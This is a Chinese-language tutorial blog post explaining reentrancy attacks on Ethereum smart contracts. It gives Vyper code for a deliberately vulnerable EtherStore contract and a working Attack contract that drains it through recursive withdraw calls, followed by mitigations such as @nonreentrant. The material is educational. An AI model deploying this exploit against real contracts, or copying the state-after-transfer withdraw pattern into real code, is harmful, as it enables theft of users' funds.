赞
踩
Reentrancy攻击是以太坊智能合约中最具破坏性的攻击之一。当一个函数对另一个不可信合约进行外部调用时,就会发生重入攻击。然后,不可信合约会递归调用原始函数,试图耗尽资金。
当合约在发送资金之前未能更新其状态时,攻击者可以不断调用提取函数以耗尽合约资金。一个著名的真实世界重入攻击案例是DAO攻击,导致损失了6000万美元。
重入攻击涉及两个智能合约。一个是易受攻击的合约,另一个是攻击者的不可信合约。
现在提取函数将再次验证它是否可以执行:
可能大家对solidity的智能合约重入攻击比较熟悉,本次文章中,我们将以Vyper的代码展示重入攻击的漏洞。
# @version >=0.3.2 """ @notice EtherStore is a contract where you can deposit ETH and withdraw that same amount of ETH later. This contract is vulnerable to re-entrancy attack. Here is the attack flow: 1. Deposit 1 ETH each from Account 1 (Alice) and Account 2 (Bob) into EtherStore. 2. Deploy the Attack contract. 3. Call the Attack contract's attack function sending 1 ether (using Account 3 (Eve)). You will get 3 Ethers back (2 Ether stolen from Alice and Bob, plus 1 Ether sent from this contract). What happened? Attack was able to call EtherStore.withdraw multiple times before EtherStore.withdraw finished executing. """ # @notice Mapping from address to ETH balance held in the contract balances: public(HashMap[address, uint256]) # @notice Function to deposit ETH into the contract @external @payable def deposit(): self.balances[msg.sender] += msg.value # @notice Function to withdraw the ETH deposited into the contract @external def withdraw(): bal: uint256 = self.balances[msg.sender] assert bal > 0, "This account does not have a balance" # @dev Send the user's balance to them using raw call raw_call(msg.sender, b'', value=bal) # @dev Set user's balance to 0 self.balances[msg.sender] = 0 # @notice Helper function to get the balance of the contract @external @view def getBalance() -> uint256: return self.balance
# @version >=0.3.2 """ @notice Here is the order of function calls during the attack - Attack.attack - EtherStore.deposit - EtherStore.withdraw - Attack.default (receives 1 Ether) - EtherStore.withdraw - Attack.default (receives 1 Ether) - EtherStore.withdraw - Attack.ldefault (receives 1 Ether) """ # @notice Interface with the Etherstore contract interface IEtherstore: def deposit(): payable def withdraw(): nonpayable def getBalance() -> uint256: view # @notice The address where the Etherstore contract is deployed victim: public(address) # @notice Set the victim address @external def setVictim(_victim:address): self.victim = _victim # @notice Default is called when EtherStore sends ETH to this contract. @external @payable def __default__(): # @dev Checks if the balance of the Etherstore contract is greater than 1 ETH (in wei) if IEtherstore(self.victim).getBalance() >= as_wei_value(1, "ether"): IEtherstore(self.victim).withdraw() @external @payable def attack(): assert msg.value >= as_wei_value(1, "ether"), "Must send 1 ETH" IEtherstore(self.victim).deposit(value=as_wei_value(1, "ether")) IEtherstore(self.victim).withdraw() # @notice Helper function to get the balance of the contract @external @view def getBalance() -> uint256: return self.balance
使用 send()
代替 call()
:重入攻击将失败,因为 send()
不会转发足够的 gas 进行下一步操作。
使用 @nonreentrant(<key>)
修饰符:在你的提取函数上应用此修饰符将阻止重入攻击。
在这篇文章中,我们探讨了Vyper智能合约中重入攻击的机制、案例以及防御方法。重入攻击是一种严重的安全威胁,当合约在发送资金之前未能更新其状态时,攻击者可以通过递归调用提取函数来耗尽合约资金。重入攻击不仅仅在solidity中很常见,在Vyper智能合约中同样应该注意!
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。